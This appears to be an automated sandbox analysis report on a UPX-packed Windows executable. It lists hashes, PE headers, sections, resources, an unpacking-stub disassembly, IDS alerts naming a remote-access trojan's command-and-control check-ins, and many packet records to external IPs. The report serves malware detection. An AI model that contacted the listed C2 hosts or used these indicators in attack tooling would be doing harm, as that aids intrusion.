                        SSDEEP:196608:nQvu0707Woow7L3XW0GDB8Zm6Y5Ao6YrRR7EDzrFa8vXGb1HOZp/tWIIe/kUCzUb:nN0707b4B2m6Y5Ao6GR7+hZ2b1HkmKbz
                        TLSH:BFC6336489B24096F05CFC35C1399DF69531AFB972DCE01E0E98BAE034FADE5A04C91B
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;T...5.U.5.U.5.UvMcUs5.U...T{5.U...Tu5.U...Te5.U...Ty5.U4M.Tz5.U.5.U.5.Ul..T~5.Ul..U~5.U.5gU~5.Ul..T~5.URich.5.U........PE..d..

                        File Icon

                        Icon Hash:11e4d4d2d2c4e451

                        Static PE Info

                        General

                        Entrypoint:0x141bcf3f0
                        Entrypoint Section:UPX1
                        Digitally signed:false
                        Imagebase:0x140000000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66791980 [Mon Jun 24 07:00:16 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:53880e0e758436150751a6d80bd6a537

                        Entrypoint Preview

                        Instruction
                        push ebx
                        push esi
                        push edi
                        push ebp
                        dec eax
                        lea esi, dword ptr [FF4CEC05h]
                        dec eax
                        lea edi, dword ptr [esi-0109D000h]
                        push edi
                        xor ebx, ebx
                        xor ecx, ecx
                        dec eax
                        or ebp, FFFFFFFFh
                        call 00007F64F0B1AA25h
                        add ebx, ebx
                        je 00007F64F0B1A9D4h
                        rep ret
                        mov ebx, dword ptr [esi]
                        dec eax
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        mov dl, byte ptr [esi]
                        rep ret
                        dec eax
                        lea eax, dword ptr [edi+ebp]
                        cmp ecx, 05h
                        mov dl, byte ptr [eax]
                        jbe 00007F64F0B1A9F3h
                        dec eax
                        cmp ebp, FFFFFFFCh
                        jnbe 00007F64F0B1A9EDh
                        sub ecx, 04h
                        mov edx, dword ptr [eax]
                        dec eax
                        add eax, 04h
                        sub ecx, 04h
                        mov dword ptr [edi], edx
                        dec eax
                        lea edi, dword ptr [edi+04h]
                        jnc 00007F64F0B1A9C1h
                        add ecx, 04h
                        mov dl, byte ptr [eax]
                        je 00007F64F0B1A9E2h
                        dec eax
                        inc eax
                        mov byte ptr [edi], dl
                        sub ecx, 01h
                        mov dl, byte ptr [eax]
                        dec eax
                        lea edi, dword ptr [edi+01h]
                        jne 00007F64F0B1A9C2h
                        rep ret
                        cld
                        inc ecx
                        pop ebx
                        jmp 00007F64F0B1A9DAh
                        dec eax
                        inc esi
                        mov byte ptr [edi], dl
                        dec eax
                        inc edi
                        mov dl, byte ptr [esi]
                        add ebx, ebx
                        jne 00007F64F0B1A9DCh
                        mov ebx, dword ptr [esi]
                        dec eax
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        mov dl, byte ptr [esi]
                        jc 00007F64F0B1A9B8h
                        lea eax, dword ptr [ecx+01h]
                        jmp 00007F64F0B1A9D9h
                        dec eax
                        inc ecx
                        call ebx
                        adc eax, eax
                        inc ecx
                        call ebx
                        adc eax, eax
                        add ebx, ebx
                        jne 00007F64F0B1A9DCh
                        mov ebx, dword ptr [esi]
                        dec eax
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        mov dl, byte ptr [esi]
                        jnc 00007F64F0B1A9B6h
                        sub eax, 03h
                        jc 00007F64F0B1A9EBh
                        shl eax, 08h
                        movzx edx, dl
                        or eax, edx
                        dec eax
                        inc esi
                        xor eax, FFFFFFFFh
                        je 00007F64F0B1AA2Ah
                        sar eax, 1

                        Rich Headers

                        Programming Language:
                        • [IMP] VS2008 SP1 build 30729

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1be9efc0x394.rsrc
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1bd00000x19efc.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0xa0000x54cUPX0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1bea2900x1c.rsrc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1bcf6600x140UPX1
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        UPX00x10000x109d0000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        UPX10x109e0000xb320000xb31800ad0fc76477b2538272647cd74e93ea9eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x1bd00000x1b0000x1a4005ed7e331e59de464c4f1ccb0081d5ce9False0.07168898809523809data5.111993796583546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        ADOBE0x71ed500x1492ff0emptyChineseChina0
                        MSC0x3067500x418600emptyChineseChina0
                        UNINS0000xb2f00x2fb45femptyChineseChina0
                        RT_ICON0x1bd02f40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.038950668401750856
                        RT_ICON0x1be0b200x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600ChineseChina0.0805452865064695
                        RT_ICON0x1be5fac0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.11203319502074689
                        RT_ICON0x1be85580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.1625234521575985
                        RT_ICON0x1be96040x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.34397163120567376
                        RT_GROUP_ICON0x1be9a700x4cdataChineseChina0.8157894736842105
                        RT_VERSION0x1be9ac00x2b8COM executable for DOSChineseChina0.4813218390804598
                        RT_MANIFEST0x1be9d7c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                        Imports

                        DLLImport
                        api-ms-win-crt-filesystem-l1-1-0.dll_lock_file
                        api-ms-win-crt-heap-l1-1-0.dllfree
                        api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                        api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                        api-ms-win-crt-runtime-l1-1-0.dllexit
                        api-ms-win-crt-stdio-l1-1-0.dllfgetc
                        KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                        MSVCP140.dll??1_Lockit@std@@QEAA@XZ
                        VCRUNTIME140.dllmemset
                        VCRUNTIME140_1.dll__CxxFrameHandler4
                        WININET.dllInternetOpenW

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        ChineseChina
                        EnglishUnited States

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        07/05/24-07:33:08.224440TCP2052875ET TROJAN Anonymous RAT CnC Checkin497316666192.168.2.4206.238.115.146
                        07/05/24-07:35:32.860010TCP2052875ET TROJAN Anonymous RAT CnC Checkin497416666192.168.2.4206.238.115.146
                        07/05/24-07:36:35.724322TCP2052875ET TROJAN Anonymous RAT CnC Checkin497448888192.168.2.4206.238.115.146
                        07/05/24-07:34:21.149333TCP2052875ET TROJAN Anonymous RAT CnC Checkin497326666192.168.2.4206.238.115.146

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jul 5, 2024 07:33:02.806615114 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:02.806674004 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:02.806744099 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:02.816004992 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:02.816026926 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:04.121081114 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:04.121207952 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:04.122019053 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:04.122216940 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:04.540115118 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:04.540153027 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:04.540457010 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:04.540535927 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:04.542411089 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:04.588500023 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:04.949336052 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:04.949352980 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:04.949393988 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:04.949562073 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:04.949577093 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:04.949630022 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.031039953 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.031148911 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.031161070 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.031222105 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.032598972 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.032663107 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.032697916 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.032705069 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.032742977 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.036003113 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.036082983 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.036091089 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.036135912 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.037962914 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.038034916 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.038043022 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.038081884 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.040693045 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.040764093 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.040771008 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.040817976 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.120743036 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.120847940 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.120865107 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.120908022 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.121611118 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.121674061 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.121682882 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.121725082 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.122400999 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.122459888 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.122467995 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.122505903 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.124325991 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.124391079 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.124397993 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.124443054 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.124619007 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.124681950 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.124689102 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.124726057 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.128606081 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.128622055 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.128706932 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.128715992 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.128762007 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.132456064 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.132468939 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.132564068 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.132571936 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.132618904 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.211297035 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.211318016 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.211360931 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.211373091 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.211409092 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.211420059 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.212424994 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.212452888 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.212491989 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.212502003 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.212527037 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.212557077 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.212794065 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.212855101 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.212862015 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.212903976 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.214402914 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.214418888 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.214466095 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.214474916 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.214490891 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.214514971 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.216075897 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.216130972 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.216137886 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.216181040 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.216347933 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.216396093 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.216403961 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.216444969 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.216681004 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.216737032 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.216744900 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.216784954 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.220623016 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.220685005 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.220693111 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.220735073 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.225718975 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.225770950 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.225780010 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.225820065 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.230592966 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.230652094 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.230660915 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.230715990 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.235692024 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.235743999 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.235753059 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.235795021 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.238662004 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.238723040 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.238730907 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.238773108 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.243673086 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.243753910 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.243762016 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.243805885 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.300818920 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.300926924 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.300940037 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.300983906 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.301094055 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.301147938 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.301156044 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.301198959 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.301645041 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.301703930 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.301711082 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.301754951 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.302038908 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.302098036 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.302104950 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.302145958 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.303823948 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.303838015 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.303885937 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.303894043 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.303920984 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.303951979 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.304527044 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.304542065 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.304585934 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.304593086 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.304620028 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.304640055 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.306251049 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.306265116 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.306319952 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.306328058 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.306366920 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.318295002 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.318320036 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.318389893 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.318397999 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.318428993 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.318450928 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.323565006 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.323581934 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.323632956 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.323642015 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.323669910 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.323681116 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.328643084 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.328736067 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.328748941 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.328802109 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.390630960 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.390646935 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.390752077 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.390765905 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.390814066 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.427654982 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.427669048 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.427777052 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.427787066 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.427829027 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.436873913 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.436887980 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.436958075 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.436966896 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.437007904 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.445880890 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.445894003 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.445966959 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.445976019 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.446027040 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.453486919 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.453500032 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.453586102 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.453594923 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.453635931 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.462590933 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.462605953 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.462666035 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.462677956 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.462702990 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.462730885 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.472167969 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.472181082 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.472278118 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.472285986 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.472333908 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.480886936 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.480927944 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.480967999 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.480973959 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.481003046 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.481026888 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.492393017 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.492408037 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.492511034 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.492518902 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.492564917 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.514766932 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.514789104 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.514868021 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.514875889 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.514911890 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.514930010 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.523658991 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.523673058 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.523761034 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.523770094 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.523816109 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.532854080 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.532867908 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.532948971 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.532963991 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.532990932 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.533015966 CEST49730443192.168.2.4159.75.57.35
                        Jul 5, 2024 07:33:05.541937113 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.541951895 CEST44349730159.75.57.35192.168.2.4
                        Jul 5, 2024 07:33:05.542041063 CEST49730443192.168.2.4159.75.57.35
